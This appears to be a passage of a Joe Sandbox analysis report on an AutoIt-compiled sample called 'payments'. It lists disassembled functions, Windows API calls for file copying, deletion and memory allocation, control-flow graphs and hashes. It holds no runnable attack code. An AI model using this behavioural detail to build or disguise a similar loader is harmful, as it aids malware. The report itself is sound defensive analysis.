                                                                                                                          • __dosmaperr.LIBCMT ref: 00CC5F34
                                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC5F47
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC5F6A
                                                                                                                          • __dosmaperr.LIBCMT ref: 00CC5F73
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC5F7C
                                                                                                                          • __set_osfhnd.LIBCMT ref: 00CC5FAC
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC6016
                                                                                                                          • __close_nolock.LIBCMT ref: 00CC603C
                                                                                                                          • __chsize_nolock.LIBCMT ref: 00CC606C
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC607E
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC6176
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC618B
                                                                                                                          • __close_nolock.LIBCMT ref: 00CC61EB
                                                                                                                            • Part of subcall function 00CBEA9C: CloseHandle.KERNELBASE(00000000,00D3EEF4,00000000,?,00CC6041,00D3EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBEAEC
                                                                                                                            • Part of subcall function 00CBEA9C: GetLastError.KERNEL32(?,00CC6041,00D3EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBEAF6
                                                                                                                            • Part of subcall function 00CBEA9C: __free_osfhnd.LIBCMT ref: 00CBEB03
                                                                                                                            • Part of subcall function 00CBEA9C: __dosmaperr.LIBCMT ref: 00CBEB25
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • __lseeki64_nolock.LIBCMT ref: 00CC620D
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC6342
                                                                                                                          • ___createFile.LIBCMT ref: 00CC6361
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CC636E
                                                                                                                          • __dosmaperr.LIBCMT ref: 00CC6375
                                                                                                                          • __free_osfhnd.LIBCMT ref: 00CC6395
                                                                                                                          • __invoke_watson.LIBCMT ref: 00CC63C3
                                                                                                                          • __wsopen_helper.LIBCMT ref: 00CC63DD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 3896587723-2766056989
                                                                                                                          • Opcode ID: 375ebc5def7e229b2fcd0ccea4e7fadcdd646346dd25a64415617f3c82f9c041
                                                                                                                          • Instruction ID: 0dfcc0cc4d1c7d3db2108fe0e9c6479a8f5ebde9825bfcc38819fc6f23dc8414
                                                                                                                          • Opcode Fuzzy Hash: 375ebc5def7e229b2fcd0ccea4e7fadcdd646346dd25a64415617f3c82f9c041
                                                                                                                          • Instruction Fuzzy Hash: 832236719006069FEB299F68CD45FFD7B61EB44320F28422DE972A72E2C7359E80DB51
                                                                                                                          Function 00CDFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFA96
                                                                                                                          • _wcschr.LIBCMT ref: 00CDFAA4
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFABB
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFACA
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFAE8
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFB09
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CDFBE6
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFC0B
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFC1D
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDFC32
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFC47
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFC59
                                                                                                                          • _wcscat.LIBCMT ref: 00CDFC6E
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscmp.LIBCMT ref: 00CDC03E
                                                                                                                            • Part of subcall function 00CDBFA4: __wsplitpath.LIBCMT ref: 00CDC083
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscpy.LIBCMT ref: 00CDC096
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscat.LIBCMT ref: 00CDC0A9
                                                                                                                            • Part of subcall function 00CDBFA4: __wsplitpath.LIBCMT ref: 00CDC0CE
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscat.LIBCMT ref: 00CDC0E4
                                                                                                                            • Part of subcall function 00CDBFA4: _wcscat.LIBCMT ref: 00CDC0F7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                          • API String ID: 2955681530-2806939583
                                                                                                                          • Opcode ID: d538457643535be6d67d2c59026689259b22b625d01c77b0bd1f9c408a98fc97
                                                                                                                          • Instruction ID: 9951d694d823de8b94bb53348635b1d89bbf8e558dc2dbe4e698740ba256c2a5
                                                                                                                          • Opcode Fuzzy Hash: d538457643535be6d67d2c59026689259b22b625d01c77b0bd1f9c408a98fc97
                                                                                                                          • Instruction Fuzzy Hash: B391A271504605AFDF20EF64C895E9BB3E8BF84310F00486EF959972A1DB31EA49DB92
                                                                                                                          Function 00C93F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C93F86
                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00C93FB0
                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C93FC1
                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00C93FDE
                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C93FEE
                                                                                                                          • LoadIconW.USER32(000000A9), ref: 00C94004
                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C94013
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                                          • Opcode ID: 496162ba6301b54b79a1785b4d316d7612c52ed4ca022aeac8de10b23c3a6e83
                                                                                                                          • Instruction ID: 704d6ce059b3fd030d08398ba481071d76e0bfc92a55fc825b0dff327e0284ef
                                                                                                                          • Opcode Fuzzy Hash: 496162ba6301b54b79a1785b4d316d7612c52ed4ca022aeac8de10b23c3a6e83
                                                                                                                          • Instruction Fuzzy Hash: 2821A9B9900319AFDB00DFA4E849BCDBBB5FB08705F10821AF915E63A0DBB54545CFA1
                                                                                                                          Function 00CDBFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CDBDB4: __time64.LIBCMT ref: 00CDBDBE
                                                                                                                            • Part of subcall function 00C94517: _fseek.LIBCMT ref: 00C9452F
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CDC083
                                                                                                                            • Part of subcall function 00CB1DFC: __wsplitpath_helper.LIBCMT ref: 00CB1E3C
                                                                                                                          • _wcscpy.LIBCMT ref: 00CDC096
                                                                                                                          • _wcscat.LIBCMT ref: 00CDC0A9
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CDC0CE
                                                                                                                          • _wcscat.LIBCMT ref: 00CDC0E4
                                                                                                                          • _wcscat.LIBCMT ref: 00CDC0F7
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDC03E
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC65D
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC670
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CDC2A1
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDC338
                                                                                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDC34E
                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDC35F
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDC371
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2378138488-0
                                                                                                                          • Opcode ID: 960cc07c7d33890a9c315ec54b50d985b5fabf837631380573368f3489c37e6d
                                                                                                                          • Instruction ID: bfbf349372b07bb488d9b6e0a8528e480318b91b24b69db3b018f4fa887ea0b9
                                                                                                                          • Opcode Fuzzy Hash: 960cc07c7d33890a9c315ec54b50d985b5fabf837631380573368f3489c37e6d
                                                                                                                          • Instruction Fuzzy Hash: 84C13BB1900219AFDF11DF95CC85EDEBBBDAF49310F1080AAF609E6251DB309A45DF61
                                                                                                                          Function 00C93742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 958 c93742-c93762 960 c937c2-c937c4 958->960 961 c93764-c93767 958->961 960->961 964 c937c6 960->964 962 c93769-c93770 961->962 963 c937c8 961->963 965 c9382c-c93834 PostQuitMessage 962->965 966 c93776-c9377b 962->966 968 d01e00-d01e2e call c92ff6 call cae312 963->968 969 c937ce-c937d1 963->969 967 c937ab-c937b3 DefWindowProcW 964->967 973 c937f2-c937f4 965->973 971 d01e88-d01e9c call cd4ddd 966->971 972 c93781-c93783 966->972 974 c937b9-c937bf 967->974 1003 d01e33-d01e3a 968->1003 975 c937d3-c937d4 969->975 976 c937f6-c9381d SetTimer RegisterWindowMessageW 969->976 971->973 996 d01ea2 971->996 978 c93789-c9378e 972->978 979 c93836-c93840 call caeb83 972->979 973->974 982 d01da3-d01da6 975->982 983 c937da-c937ed KillTimer call c93847 call c9390f 975->983 976->973 980 c9381f-c9382a CreatePopupMenu 976->980 985 d01e6d-d01e74 978->985 986 c93794-c93799 978->986 997 c93845 979->997 980->973 989 d01da8-d01daa 982->989 990 d01ddc-d01dfb MoveWindow 982->990 983->973 985->967 992 d01e7a-d01e83 call cca5f3 985->992 994 c9379f-c937a5 986->994 995 d01e58-d01e68 call cd55bd 986->995 998 d01dcb-d01dd7 SetFocus 989->998 999 d01dac-d01daf 989->999 990->973 992->967 994->967 994->1003 995->973 996->967 997->973 998->973 999->994 1004 d01db5-d01dc6 call c92ff6 999->1004 1003->967 1007 d01e40-d01e53 call c93847 call c94ffc 1003->1007 1004->973 1007->967
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00C937B3
                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00C937DD
                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C93800
                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C9380B
                                                                                                                          • CreatePopupMenu.USER32 ref: 00C9381F
                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00C9382E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                          • String ID: TaskbarCreated
                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                          • Opcode ID: 31a0ae6dda9c1cdeb7b3553a2d560da32644b3df8ac8a8ab7619dfbde149daa0
                                                                                                                          • Instruction ID: 227e6188a19e651e8be95d18a5c1aad3943ad6256bf4da2607b4c7a479a6d5a6
                                                                                                                          • Opcode Fuzzy Hash: 31a0ae6dda9c1cdeb7b3553a2d560da32644b3df8ac8a8ab7619dfbde149daa0
                                                                                                                          • Instruction Fuzzy Hash: 1341E2F920439AABDF149BACDE4EFBA3696FB04302F444115FD16D22D1CB609E509771
                                                                                                                          Function 00C93E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C93E79
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C93E88
                                                                                                                          • LoadIconW.USER32(00000063), ref: 00C93E9E
                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00C93EB0
                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00C93EC2
                                                                                                                            • Part of subcall function 00C94024: LoadImageW.USER32(00C90000,00000063,00000001,00000010,00000010,00000000), ref: 00C94048
                                                                                                                          • RegisterClassExW.USER32(?), ref: 00C93F30
                                                                                                                            • Part of subcall function 00C93F53: GetSysColorBrush.USER32(0000000F), ref: 00C93F86
                                                                                                                            • Part of subcall function 00C93F53: RegisterClassExW.USER32(00000030), ref: 00C93FB0
                                                                                                                            • Part of subcall function 00C93F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C93FC1
                                                                                                                            • Part of subcall function 00C93F53: InitCommonControlsEx.COMCTL32(?), ref: 00C93FDE
                                                                                                                            • Part of subcall function 00C93F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C93FEE
                                                                                                                            • Part of subcall function 00C93F53: LoadIconW.USER32(000000A9), ref: 00C94004
                                                                                                                            • Part of subcall function 00C93F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C94013
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                          • Opcode ID: 08dde83c320935dad876de76a02daf9f4b14b792905455f46493523f93386361
                                                                                                                          • Instruction ID: f66afd955377ef40fa79edf9f70889e47bfb18d4a714556faeda322ca1846bae
                                                                                                                          • Opcode Fuzzy Hash: 08dde83c320935dad876de76a02daf9f4b14b792905455f46493523f93386361
                                                                                                                          • Instruction Fuzzy Hash: 46212AB8D40344ABDB00DFA9EC49B9DBBF5EB48311F00816AEA15E23A0D7754645CBB1
                                                                                                                          Function 00CBACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1022 cbacb3-cbace0 call cb6ac0 call cb7cf4 call cb6986 1029 cbacfd-cbad02 1022->1029 1030 cbace2-cbacf8 call cbe880 1022->1030 1032 cbad08-cbad0f 1029->1032 1036 cbaf52-cbaf57 call cb6b05 1030->1036 1034 cbad42-cbad51 GetStartupInfoW 1032->1034 1035 cbad11-cbad40 1032->1035 1037 cbae80-cbae86 1034->1037 1038 cbad57-cbad5c 1034->1038 1035->1032 1039 cbae8c-cbae9d 1037->1039 1040 cbaf44-cbaf50 call cbaf58 1037->1040 1038->1037 1042 cbad62-cbad79 1038->1042 1043 cbae9f-cbaea2 1039->1043 1044 cbaeb2-cbaeb8 1039->1044 1040->1036 1047 cbad7b-cbad7d 1042->1047 1048 cbad80-cbad83 1042->1048 1043->1044 1050 cbaea4-cbaead 1043->1050 1051 cbaeba-cbaebd 1044->1051 1052 cbaebf-cbaec6 1044->1052 1047->1048 1049 cbad86-cbad8c 1048->1049 1054 cbadae-cbadb6 1049->1054 1055 cbad8e-cbad9f call cb6986 1049->1055 1056 cbaf3e-cbaf3f 1050->1056 1057 cbaec9-cbaed5 GetStdHandle 1051->1057 1052->1057 1059 cbadb9-cbadbb 1054->1059 1066 cbae33-cbae3a 1055->1066 1067 cbada5-cbadab 1055->1067 1056->1037 1060 cbaf1c-cbaf32 1057->1060 1061 cbaed7-cbaed9 1057->1061 1059->1037 1064 cbadc1-cbadc6 1059->1064 1060->1056 1063 cbaf34-cbaf37 1060->1063 1061->1060 1065 cbaedb-cbaee4 GetFileType 1061->1065 1063->1056 1068 cbadc8-cbadcb 1064->1068 1069 cbae20-cbae31 1064->1069 1065->1060 1070 cbaee6-cbaef0 1065->1070 1071 cbae40-cbae4e 1066->1071 1067->1054 1068->1069 1072 cbadcd-cbadd1 1068->1072 1069->1059 1073 cbaefa-cbaefd 1070->1073 1074 cbaef2-cbaef8 1070->1074 1077 cbae50-cbae72 1071->1077 1078 cbae74-cbae7b 1071->1078 1072->1069 1079 cbadd3-cbadd5 1072->1079 1075 cbaf08-cbaf1a InitializeCriticalSectionAndSpinCount 1073->1075 1076 cbaeff-cbaf03 1073->1076 1080 cbaf05 1074->1080 1075->1056 1076->1080 1077->1071 1078->1049 1081 cbadd7-cbade3 GetFileType 1079->1081 1082 cbade5-cbae1a InitializeCriticalSectionAndSpinCount 1079->1082 1080->1075 1081->1082 1083 cbae1d 1081->1083 1082->1083 1083->1069
                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 00CBACC1
                                                                                                                            • Part of subcall function 00CB7CF4: __mtinitlocknum.LIBCMT ref: 00CB7D06
                                                                                                                            • Part of subcall function 00CB7CF4: EnterCriticalSection.KERNEL32(00000000,?,00CB7ADD,0000000D), ref: 00CB7D1F
                                                                                                                          • __calloc_crt.LIBCMT ref: 00CBACD2
                                                                                                                            • Part of subcall function 00CB6986: __calloc_impl.LIBCMT ref: 00CB6995
                                                                                                                            • Part of subcall function 00CB6986: Sleep.KERNEL32(00000000,000003BC,00CAF507,?,0000000E), ref: 00CB69AC
                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CBACED
                                                                                                                          • GetStartupInfoW.KERNEL32(?,00D46E28,00000064,00CB5E91,00D46C70,00000014), ref: 00CBAD46
                                                                                                                          • __calloc_crt.LIBCMT ref: 00CBAD91
                                                                                                                          • GetFileType.KERNEL32(00000001), ref: 00CBADD8
                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00CBAE11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1426640281-0
                                                                                                                          • Opcode ID: 8bbab121cb0d49cd42624f046993cbf3cc45fe898ed310905ea874142ab7a81f
                                                                                                                          • Instruction ID: 3c52d5d0f712269700b2e3a7d58d678a45f815c92cd44b8529afbb72274a834a
                                                                                                                          • Opcode Fuzzy Hash: 8bbab121cb0d49cd42624f046993cbf3cc45fe898ed310905ea874142ab7a81f
                                                                                                                          • Instruction Fuzzy Hash: 88819D719053459FDB24CFA8C8805E9BBF0AF0A325F24426DD4A6EB3D1D7349903CB66
                                                                                                                          Function 010AD330 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1084 10ad330-10ad3de call 10aad40 1087 10ad3e5-10ad40b call 10ae240 CreateFileW 1084->1087 1090 10ad40d 1087->1090 1091 10ad412-10ad422 1087->1091 1092 10ad55d-10ad561 1090->1092 1096 10ad429-10ad443 VirtualAlloc 1091->1096 1097 10ad424 1091->1097 1094 10ad5a3-10ad5a6 1092->1094 1095 10ad563-10ad567 1092->1095 1098 10ad5a9-10ad5b0 1094->1098 1099 10ad569-10ad56c 1095->1099 1100 10ad573-10ad577 1095->1100 1103 10ad44a-10ad461 ReadFile 1096->1103 1104 10ad445 1096->1104 1097->1092 1105 10ad5b2-10ad5bd 1098->1105 1106 10ad605-10ad61a 1098->1106 1099->1100 1101 10ad579-10ad583 1100->1101 1102 10ad587-10ad58b 1100->1102 1101->1102 1109 10ad59b 1102->1109 1110 10ad58d-10ad597 1102->1110 1111 10ad468-10ad4a8 VirtualAlloc 1103->1111 1112 10ad463 1103->1112 1104->1092 1113 10ad5bf 1105->1113 1114 10ad5c1-10ad5cd 1105->1114 1107 10ad62a-10ad632 1106->1107 1108 10ad61c-10ad627 VirtualFree 1106->1108 1108->1107 1109->1094 1110->1109 1115 10ad4aa 1111->1115 1116 10ad4af-10ad4ca call 10ae490 1111->1116 1112->1092 1113->1106 1117 10ad5cf-10ad5df 1114->1117 1118 10ad5e1-10ad5ed 1114->1118 1115->1092 1124 10ad4d5-10ad4df 1116->1124 1120 10ad603 1117->1120 1121 10ad5fa-10ad600 1118->1121 1122 10ad5ef-10ad5f8 1118->1122 1120->1098 1121->1120 1122->1120 1125 10ad512-10ad526 call 10ae2a0 1124->1125 1126 10ad4e1-10ad510 call 10ae490 1124->1126 1132 10ad52a-10ad52e 1125->1132 1133 10ad528 1125->1133 1126->1124 1134 10ad53a-10ad53e 1132->1134 1135 10ad530-10ad534 CloseHandle 1132->1135 1133->1092 1136 10ad54e-10ad557 1134->1136 1137 10ad540-10ad54b VirtualFree 1134->1137 1135->1134 1136->1087 1136->1092 1137->1136
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010AD401
                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010AD627
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 204039940-0
                                                                                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                          • Instruction ID: b61bf88624641abddec9ef5d4239931683a0df6162225e59721aa8d1c29d9f12
                                                                                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                          • Instruction Fuzzy Hash: 5BA10770E00209EBDB14CFE8C894BEEBBB5BF48304F608599E245BB281D7759A81CF54
                                                                                                                          Function 00C949FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
